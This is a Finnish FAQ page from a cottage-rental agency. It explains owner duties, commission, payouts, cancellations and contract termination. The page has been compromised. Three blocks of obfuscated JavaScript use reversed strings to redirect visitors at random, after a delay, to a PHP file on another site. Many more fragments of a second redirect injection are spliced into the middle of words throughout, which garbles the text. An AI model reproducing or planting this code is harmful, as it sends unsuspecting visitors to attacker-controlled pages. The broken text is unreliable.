Usein kysyttyä

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}top-equal-layout has-tablet-equal-layout has-mobile-collapsedRows-layout has-nogap-gap has-vertical-flex-start” id=”wp-block-themeisle-blocks-advanced-columns-3cf6f19d”>

OSAPUOLTEN VASTUUALUEET

Mitkä asiat ovat Majoittaja.fi:n vastuulla?

Vastaamme koko vuokralaisten hankintaan liittyvästä työstä eli kohteen markkinoinnista, varauskyselyihin vastaamisesta, varausten käsittelystä, varauskalenterin ylläpidosta, vuokrien tilityksistä sekä kaikkien osapuolten tiedottamisesta.

Mitkä asiat ovat mökin omistajan vastuulla?

Omistajat vastaavat siitä, että vuokralaisilla on mökille vapaa pääsy ja mökki on vuokraajille siistissä kunnossa. Nämä seikat voidaan myös ulkoistaa valtuutetulle luottobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tohenkilölle tai yhteistyöverkostobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomme yritykselle.

Miten avaimet luovutetaan?

Suosittelemme, että mökin omistaja tai valtuutettu yhteyshenkilö luovuttaa vuokraajille avaimet henkilökohtaisesti. Avaimet voidaan kuitenkin jättää myös sovittuun paikkaan vuokralaisten noudettavaksi.

Kuinka mökin siivous hoidetaan?

Vuokralainen vastaa vuokraehtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tojen mukaisesti mökin siivouksesta, elleivät vuokralaiset ole erikseen loppusiivousta ostaneet. Omistaja tai valtuutettu yhteyshenkilö tai valtuutettu kumppaniyritys on kuitenkin vastuussa siitä, että mökki on siistissä ja asianmukaisessa kunnossa ennen seuraavan vuokralaisen saapumista.

Mitä jos paikat rikkoutuvat?

Vuokralaiset vastaavat mökille aiheuttamistaan vahingoista vuokraehtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tojen mukaisesti.

Millaiset vakuutukset on oltava?

Omistaja vastaa siitä, että mökki on asianmukaisesti vakuutettu täysarvovakuutuksella (mukaan lukien koti- ja irtaimistobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovakuutus) sekä vastuuvakuutuksella ja varustettu lain ja asetusten vaatimalla tavalla.

Voiko omistaja käyttää mökkiä itse?

Omistaja voi käyttää mökkiään myös itse. Omissa varauksissa omistajan on vain tarkastettava varauskalenterista, että mökki on vapaana.

HINNOITTELU, TUOTOT JA PROVISIO

Paljonko vuokratuloja voi saada?

Vuokratulojen suuruus vaihtelee merkittävästi eri kohteiden välillä. Keskimäärin olemme saaneet hankittua vuokratuloja bruttobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tona noin 7500€/vuosi/mökki.

Miten vuokratulot maksetaan?

Tilitämme mökin omistajille kuukausittain vuokratulot aina edellisen kuukauden aikana tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toteutuneista varauksista.

Miten vuokrahinnat määritellään?

Majoittaja.fi:llä on käytössä oma hinnoittelumalli. Yhteistyö on tulosperusteista, mikä takaa sen, että tavoittelemme aina parasta mahdollista tulosta hinnoittelullamme.

Mikä on provision suuruus?

Palvelussamme ainutlaatuista on se, että annamme mökin omistajan itse päättää meille maksettavan provision suuruuden. Arvokeskiössämme on läpinäkyvä ja aitobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to yhteistyö, mitä vahvistamme tällä tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toimintatavalla.

Kuinka provisio maksetaan?

Me veloitamme vuokralaisilta vuokrat, joista vähennämme provision ja tilitämme loput mökin omistajalle. Tilitetyt vuokrat ovat aina 100%:sti omistajan eikä omistajan tarvitse koskaan maksaa meidän suuntaan mitään.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}top-equal-layout has-tablet-equal-layout has-mobile-collapsedRows-layout has-nogap-gap has-vertical-flex-start” id=”wp-block-themeisle-blocks-advanced-columns-4f1922a2″>

VARAUKSET JA PERUUTUKSET

Mistä voi nähdä varaustilanteen?

Pidämme yllä varauskalenteria, johon omistajalla on aina vapaa pääsy.

Voiko omistaja vuokrata mökkiä itse?

Omistajalla on oikeus vuokrata mökkiä myös itse. Omistajan on kuitenkin ilmoitettava meille tekemistään varauksista sekä varmistettava varauskalenterista, että kyseiselle ajankohdalle ei ole jo olemassa olevaa varausta.

Mitä jos vuokralainen peruu varauksensa?

Yleisesti vuokraehtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tojen perusteella palautamme 75% vuokrasummasta vuokralaiselle, jos peruutus tehdään yli 30 päivää ennen vuokrausajankohtaa. Jos varaus perutaan, kun vuokrausajankohtaan on alle 30 päivää, emme palauta jo maksettuja vuokria. On kuitenkin huomioitava, että välillä joudumme soveltaa tilannekohtaisesti peruttujen vuokrasummien maksuja (esim. force majeure – ylivoimainen este). Peruutuksesta syntyvät vuokratulot tilitetään omistajille normaalisti.

MARKKINOINTI JA VIESTINTÄ

Miten mökkiä markkinoidaan?

Markkinoimme mökkejä useissa eri markkinointikanavissa, joiden kautta hankimme varauksia.

Markkinoidaanko mökkiä ulkomaille?

Kyllä, osa hankkimistamme asiakkasta ovat ulkomaalaisia.

Kuinka omistajalle ilmoitetaan uudesta varauksesta?

Lähetämme varausvahvistuksen omistajalle aina saatuamme varauksen. Varaus päivittyy myös varauskalenteriin.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}top-equal-layout has-tablet-equal-layout has-mobile-collapsedRows-layout has-nogap-gap has-vertical-flex-start” id=”wp-block-themeisle-blocks-advanced-columns-9f13b325″>

SOPIMUKSEN IRTISANOMINEN

Kuinka omistaja voi irtisanoa sopimuksen?

Molemmilla osapuolilla on yhtäläinen oikeus irtisanoa sopimus koska tahansa.

Mikä on sopimuksen irtisanomisaika?

Irtisanomisaikaa ei ole, sopimus voidaan irtisanoa välittömästi.

Miten irtisanominen tehdään?

Irtisanominen on tehtävä kirjallisesti Majoittaja.fi:lle.

Sopimus ja vuokraehdot

Majoittaja.fi ja mökin omistajan välinen sopimus on tiivistetty pähkinänkuoreen täällä.

Majoittaja.fi ja vuokralaisen väliset vuokraehdot löytyvät täältä.